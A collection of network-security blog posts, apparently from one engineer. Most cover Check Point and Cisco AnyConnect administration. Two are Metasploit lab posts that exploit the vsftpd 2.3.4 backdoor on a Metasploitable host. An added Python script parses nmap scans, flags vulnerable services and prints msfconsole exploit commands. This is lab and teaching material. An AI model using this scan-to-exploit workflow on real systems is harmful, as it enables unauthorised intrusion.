
Posts

Checkpoint Logs – Previously the Magical Smart Tracker!

Smart Tracker lovers who prefer a separate window for checking logs are in for a disappointment: there is no separate Smart Tracker utility in SmartConsole, because Check Point R80.x consolidates everything into a unified work pane and configuration wizard. Log viewing is handled by the "Logs & Monitor" tab, as shown below. The desired traffic log can still be filtered the way it was done earlier: right-click on the Source, Destination, Origin (gateway) or Application field of a log entry. Below, the filter being applied is Source = 198.51.100.193 and Destination = 198.51.100.193. A filter can also be defined by selecting an IP address or a service port, as shown below. Happy troubleshooting!

Metasploit - Exploiting vsftpd vulnerability

Let us try the exploit below. Disclaimer: I ran an intensive Nmap scan against the FTP port and went through a couple of trial-and-error rounds before figuring out that port 21 is running a vsftpd build with the "vsftpd_234_backdoor" vulnerability that can be exploited. Below, the Unix "vsftpd_234_backdoor" vulnerability on Metasploitable 2 is exploited using Armitage. The end result is that the exploited host presents its shell prompt, through which we were able to create our own directory.

Metasploit - Scanning vulnerable systems

Open Armitage from the Kali Linux "Applications" pane (the icon with the green-haired lady), as below. Click "Connect" and then "OK" on the prompts below. Ignore the following prompts. Enter the target IP of the host whose vulnerability needs to be exploited; this seems to be a mandatory window, since no matter how many times I click "Cancel" it keeps popping up. Run the nmap scan as below to find the list of hosts active on the network. A small excerpt of the scan output follows. The active, responding hosts are listed in the right-hand window. My vulnerable host is 192.168.1.111 (the Metasploitable host). The list of open ports on this host, based on the nmap scan, is shown below. We will exploit one of these vulnerabilities in the next post.
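The two Metasploit posts above (scanning for live hosts and open ports, then picking the port 21 service that the vsftpd_234_backdoor module targets) can be done without clicking through Armitage. The following is an added example, not code from the original posts or from the Metasploit project: it parses the XML that `nmap -sV -oX` writes, lists the hosts that are up with their open ports, and flags any service whose product/version matches a small lookup table of Metasploit modules. The XML is a constructed sample that imitates a scan of a Metasploitable host, the `KNOWN_EXPLOITS` table and the `msf_commands` helper are this example's own conventions, and the RHOSTS/RPORT option names are those of current msfconsole.

```python
"""Parse nmap -oX output and flag services with a known Metasploit module.

Added example: parses an nmap XML report (a constructed sample is embedded
below), lists hosts that are up together with their open ports, and maps
product/version fingerprints to the Metasploit module that exploits them.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample of nmap -sV -oX output (not a real capture). Host
# 192.168.1.111 imitates a Metasploitable 2 box with vsftpd 2.3.4 on port 21.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.1.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.1.111" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.7p1"/></port>
      <port protocol="tcp" portid="23"><state state="open"/>
        <service name="telnet" product="Linux telnetd"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.1.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="21"><state state="closed"/><service name="ftp"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.1.50" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# (product, version) -> Metasploit module. Only the vsftpd entry comes from the
# post above; the table itself is this example's own convention (assumption).
KNOWN_EXPLOITS = {
    ("vsftpd", "2.3.4"): "exploit/unix/ftp/vsftpd_234_backdoor",
}


@dataclass
class Port:
    number: int
    proto: str
    service: str
    product: str
    version: str


@dataclass
class Host:
    addr: str
    ports: list[Port] = field(default_factory=list)


def parse_nmap_xml(xml_text: str) -> list[Host]:
    """Return hosts whose status is 'up', each with only its open ports."""
    root = ET.fromstring(xml_text)
    hosts: list[Host] = []
    for h in root.findall("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue  # skip hosts that did not respond
        addr_el = h.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        host = Host(addr=addr_el.get("addr", ""))
        for p in h.findall("ports/port"):
            state = p.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not interesting here
            svc = p.find("service")
            attr = svc.get if svc is not None else (lambda k, d="": d)
            host.ports.append(Port(
                number=int(p.get("portid", "0")),
                proto=p.get("protocol", "tcp"),
                service=attr("name", ""),
                product=attr("product", ""),
                version=attr("version", ""),
            ))
        hosts.append(host)
    return hosts


def find_exploitable(hosts: list[Host]) -> list[tuple[str, int, str]]:
    """Return (address, port, module) for every service in KNOWN_EXPLOITS."""
    hits = []
    for host in hosts:
        for port in host.ports:
            module = KNOWN_EXPLOITS.get((port.product, port.version))
            if module:
                hits.append((host.addr, port.number, module))
    return hits


def msf_commands(addr: str, port: int, module: str) -> list[str]:
    """msfconsole commands equivalent to the Armitage click-through."""
    return [f"use {module}", f"set RHOSTS {addr}", f"set RPORT {port}", "run"]


if __name__ == "__main__":
    live = parse_nmap_xml(SAMPLE_NMAP_XML)
    for host in live:
        print(host.addr, [f"{p.number}/{p.proto} {p.product} {p.version}".strip() for p in host.ports])
    for hit in find_exploitable(live):
        print("\n".join(msf_commands(*hit)))
```

Run against a real report with `nmap -sV -oX scan.xml 192.168.1.0/24` and read the file into `parse_nmap_xml`; the version match is exact, so hosts whose banner is hidden or altered will not be flagged and still need the manual trial and error the post describes.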

Cisco Anyconnect VPN client

You might have come across a problem with end users of the Cisco AnyConnect client: a user keeps using the old VPN profile you replaced with a new one, simply because the old profile is still populated in the client and he doesn't want the trouble of entering the new one. The Cisco AnyConnect VPN client stores its cache, i.e. the list of all VPN profiles it has ever used, in the "preferences.xml" file located at: C:\Users\<Username>\AppData\Local\Cisco\Cisco AnyConnect Secure Mobility Client\preferences.xml. Apart from the client certificate, preferences.xml should show all settings that have been changed from their defaults, such as "Block Untrusted Servers" and "Allow local LAN access". The XML file should look like the one below. Deleting "preferences.xml" clears the cache and reverts the client to its default settings, and the old profile vanishes from the end user's client right away.

Checkpoint R80.10 IPSEC VPN Configuration - Part 2

Continuing from Part 1 (apparently I was too drowsy to paste the pictures into that article last night :)):
6. Multiple Entry Points (MEP).
7. Excluded Services: select the services that should not be encrypted over the tunnel.
8. Enable the pre-shared secret (PSK) and enter it.
9. Wire Mode: usually left at the default.
10. In the Advanced tab, define the renegotiation timers for Phase 1 (IKE) and Phase 2 (IPsec).

Checkpoint R80.10 - Upgrade using Blink Utility

The year is 2018. The war between the worldwide Check Point community and Check Point Software Technologies Ltd. over the future of R77.30 is in full swing. The community's general consensus, that the R77.30 support timeline (currently May 2019) should be extended, seems to be falling on deaf ears. In a desperate attempt to make hay while the sun still shines, administrators are moving to R80.10 as soon as possible. To ease things a bit, Check Point has created the "Blink" utility. Here is how it works (make sure you read the constraints at the bottom of this article). You have a newly ordered Check Point Security Gateway*, for example a CP 4600. It came with the default R77.30 image, which needs to be upgraded to R80.10 without going through the hassle of a clean install (maybe because you do NOT want to rely on the on-site technician, or because there is no Internet connectivity and hence no online CPUSE, or because you just want to te...

Checkpoint - Exporting Objects in CSV format

Be it a Network Operations Manager, a Security Architect or a Security Auditor, the people up the hierarchy always harangue the Security Engineers to compile the list of firewall objects, rules, policies, traffic statistics and so on. This can turn out to be quite hectic, especially when there is no built-in feature to produce the output systematically in a "layman-readable" format. Enter Check Point's "Object Explorer...", which not only provides the output in a "layman-readable" format but also offers built-in filtering, so the Security Engineer doesn't have to rely on Google to shore up his scarce Microsoft Excel data-filtering skills. The following screenshots show how easy it is, with Check Point R80.10, to generate a firewall configuration inventory. In the SmartConsole unified portal, navigate to Menu >> Open Object Explorer... Select the categories you wish to see in your output. Click o...